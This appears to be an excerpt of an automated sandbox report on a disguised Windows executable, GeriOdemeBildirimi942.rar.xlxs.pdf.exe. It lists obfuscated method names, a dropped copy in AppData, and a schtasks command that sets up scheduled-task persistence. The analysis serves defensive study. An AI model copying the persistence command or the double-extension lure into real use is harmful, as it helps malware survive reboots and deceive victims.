Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gyQy9mKk9Sj4qkfZTl.cs High entropy of concatenated method names: 'jTSGw4nt4P', 'wdoGLj8pet', 'itjGAgZhm2', 'aKqG9ec997', 'LwXG8E5yE0', 'v3mGUY9MOi', 'GPEJ5kEdY0l3adFpK9', 'JauLGez7RxAu7idIcS', 'lUcGG4kXOL', 'KbhGnCwZeu'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, i9NgCZSWkgDvF746L2.cs High entropy of concatenated method names: 'LENkIjuKTN', 'OafklcsJpk', 'a9Fq5eWQ3v', 'vdvq7ER0yp', 'c5xqtP0heT', 'Ts7qJCEbli', 'btwqZFplLy', 'W4IqQ7vJhC', 'WPRq6trck7', 'mI4qd3bwuS'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, lQiCylDbuWK8hAmcEC.cs High entropy of concatenated method names: 'ToString', 'mOaU3YFUso', 'KCEUc0Y4bC', 'mfoU5wXYcy', 'onvU7YNIY5', 'tpuUt3Mlxi', 'YS6UJ8yXyH', 'dDmUZfBq9I', 'zvCUQURaJA', 'unRU6NVc1U'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, wfmuxKccGtsDajMlAe.cs High entropy of concatenated method names: 'OFNMeY08RZ', 'qooMTFRYAO', 'UmcYCeftjN', 'meTYGTXb3o', 'dJIM3tg1RY', 'Ef9MW42Y2M', 'G1aMhp6Cas', 'NfFMuVNOiC', 'SumMr7axBG', 'WvYMFlVHNg'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, qfVZ9t1fu6WDpyoTODH.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eUbPuTJwP4', 'WxePr4Ic8Q', 'i2bPFK5HF9', 'ffjPOWNyJ0', 'qwgPHST8ek', 'AfUP0vHQMw', 'AAoPKXEXKf'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, AkvZU4WDIaFkxJmh7r.cs High entropy of concatenated method names: 'QePDuVyYBW', 'Lw9DrmqQtw', 'wKEDFA9vFu', 'zYkDOuNZpA', 'dCgDHdo44y', 'xIsD0PiDAA', 'iubDK0pAvv', 'CpMDe7beF7', 'JgkDsAUS3x', 'vwDDT6gFh2'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, b2mCNG10iQkY19oTwYA.cs High entropy of concatenated method names: 'jMqR1XVLKm', 'wM7RN6SktP', 'MMqRymU4gw', 'PXrRiLFSWo', 'TtpRIIxplk', 'kBvRxIJbHG', 'FM0RlyKDR9', 'UyJR4xSv43', 'iotRbCacGv', 'nYmRBUCcof'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, hLi8mXJ5Khswjlivkb.cs High entropy of concatenated method names: 'BDm2f5ElpD', 'Oec2DZOLrN', 'JwY2kklVBd', 'StV2wJcW0B', 'HyM2LjlMfN', 'mfqkHDPnFP', 'iQwk0gp1ej', 'Xt0kKCUqd0', 'iouke22xIe', 'axskspvN6t'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, sfppKNqtuStwuHs2PL.cs High entropy of concatenated method names: 'R6wRGVUWvx', 'uXyRnrmeHk', 'KTcRvJd7Xy', 'rXGRXKVMRt', 'lJNRDE8G5P', 'UnqRkcbxpX', 'sGmR26QG4K', 'nQhYKT1RNP', 'P2sYeyIuML', 'pMcYsvYI68'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, YuOfOPHITqDbKEIJ9U.cs High entropy of concatenated method names: 'vb7yjt2D2', 'rjYisIsYe', 'uXXxXgLFa', 'BVhlStUG4', 'H9ObnC0r4', 'KqYBYCiST', 'lUNHhiQ80hpvqj4f6G', 'xrsCsvi5fXTpegWPi4', 'n1Xmbrd9GQ34gYhd0o', 'hYVYoCASH'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.cs High entropy of concatenated method names: 'QW8nfX3DxC', 'Y9RnXYgKYD', 'AVdnD9EfWE', 'DWunqKUuFe', 'simnkFs9u9', 'wyln2RUhyR', 'gvonwbsdwS', 'HGLnLcg8dG', 'yoAnEuHcmw', 'bdpnAsPPj2'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, fh0VDChk6xbBJVGHfn.cs High entropy of concatenated method names: 'iGxg4Hke4k', 'FiUgbNodeP', 'zUCgmNidVO', 'YQQgcZI97h', 'xaTg7aj9vE', 'EeVgtQ4MAW', 'kIVgZUgmK4', 'riJgQiMMs0', 'jKegdIjXf1', 'HtUg3BktZR'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, xLgx0wL9epL6YDiocQ.cs High entropy of concatenated method names: 'jijw1bKQoJ', 'jAOwNk9buI', 'hbGwyPoaEi', 'eKlwiXaajX', 'BdQwIjLBG0', 'cswwxavNfY', 'BUpwlenTGf', 'p8Dw4vxZZq', 'x0jwbHCCTj', 'tt9wBC898g'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, LLP85LTDBHgT5Iin7N.cs High entropy of concatenated method names: 'mksqinZTmH', 'QSUqx4kNkL', 'XhTq47C0Iv', 'WCMqbPGT7G', 'E7yq8Gl6Td', 'Vx8qU7w6Tl', 'XAnqMkClux', 'LXjqYFarEi', 'u0SqRd8Gay', 'b1dqP88HOG'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, XPp2DtzlxtLiZfOYCO.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qMlRgeOvCP', 'nfsR8knFv7', 'kIARUGgUkq', 'HfcRMrkGoG', 'DdsRYp0gZG', 'gnaRR38phV', 'MO2RPMF3ub'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, RSYeSwYT0Sh5pRPAbT.cs High entropy of concatenated method names: 'Dispose', 'zklGsPxsHV', 'g3CScc5bbG', 'QZKjj65YcT', 'WNTGT6enkE', 'KDiGzPePyZ', 'ProcessDialogKey', 'sYPSCeJLX8', 'sjySGgmnxr', 'LwlSSYtBuj'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, T47EeKuAlyHS1bEdGK.cs High entropy of concatenated method names: 'wOLYm2MP6N', 'mZoYcl2U9u', 'jwaY5ldwFK', 'troY7IOgQi', 'x1kYu8NO7E', 'xHCYtiYIwN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, IoII6EEbDCScbo28Np.cs High entropy of concatenated method names: 'g4Q8diZUls', 'xEa8WnfNBc', 'Auk8uAyN8m', 'cZi8rxZVdv', 'J5l8cbUepV', 'M3185uaraa', 'jAc87pi2qS', 'X0Z8tolEnA', 'xqS8Jtrhoa', 'b748Z5aDhf'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, Sm0QWOUtRIVaGPnUQj.cs High entropy of concatenated method names: 'CJkYXehmWF', 'QVLYD44ftN', 'GsuYqfj1N3', 'KkCYktqkTs', 'KDyY2fePJ2', 'zHVYw28hX3', 'ybOYLYp6Bl', 'JpUYEXbbH7', 'LDyYAwKZiI', 'neDY9pcyPZ'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, yx3eKTRD6e5DRY0EXd.cs High entropy of concatenated method names: 'hvhMAgvqeq', 'AnbM9q6CNC', 'ToString', 'X6eMXTJoBL', 'OsWMD4GS0B', 'y2FMq6o0TZ', 'YVTMkIcK1b', 'RUhM2sjmOd', 'Hq4MwrkBi3', 'A2lMLiJrYN'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, OldAHhkVUFSgVhwLNN.cs High entropy of concatenated method names: 'w9twXmWo2w', 'l6IwqehMMI', 'A6Sw2np7Av', 'cwS2TyoAE7', 'wTX2zSVA0e', 'zjawCtL0Bx', 'xbTwGDkWJZ', 'VD7wS7dJii', 'jP3wnU4eOG', 'OZlwvrGFLY'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gyQy9mKk9Sj4qkfZTl.cs High entropy of concatenated method names: 'jTSGw4nt4P', 'wdoGLj8pet', 'itjGAgZhm2', 'aKqG9ec997', 'LwXG8E5yE0', 'v3mGUY9MOi', 'GPEJ5kEdY0l3adFpK9', 'JauLGez7RxAu7idIcS', 'lUcGG4kXOL', 'KbhGnCwZeu'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, i9NgCZSWkgDvF746L2.cs High entropy of concatenated method names: 'LENkIjuKTN', 'OafklcsJpk', 'a9Fq5eWQ3v', 'vdvq7ER0yp', 'c5xqtP0heT', 'Ts7qJCEbli', 'btwqZFplLy', 'W4IqQ7vJhC', 'WPRq6trck7', 'mI4qd3bwuS'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, lQiCylDbuWK8hAmcEC.cs High entropy of concatenated method names: 'ToString', 'mOaU3YFUso', 'KCEUc0Y4bC', 'mfoU5wXYcy', 'onvU7YNIY5', 'tpuUt3Mlxi', 'YS6UJ8yXyH', 'dDmUZfBq9I', 'zvCUQURaJA', 'unRU6NVc1U'
Drops PE files
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe File created: C:\Users\user\AppData\Roaming\SOFcFE.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
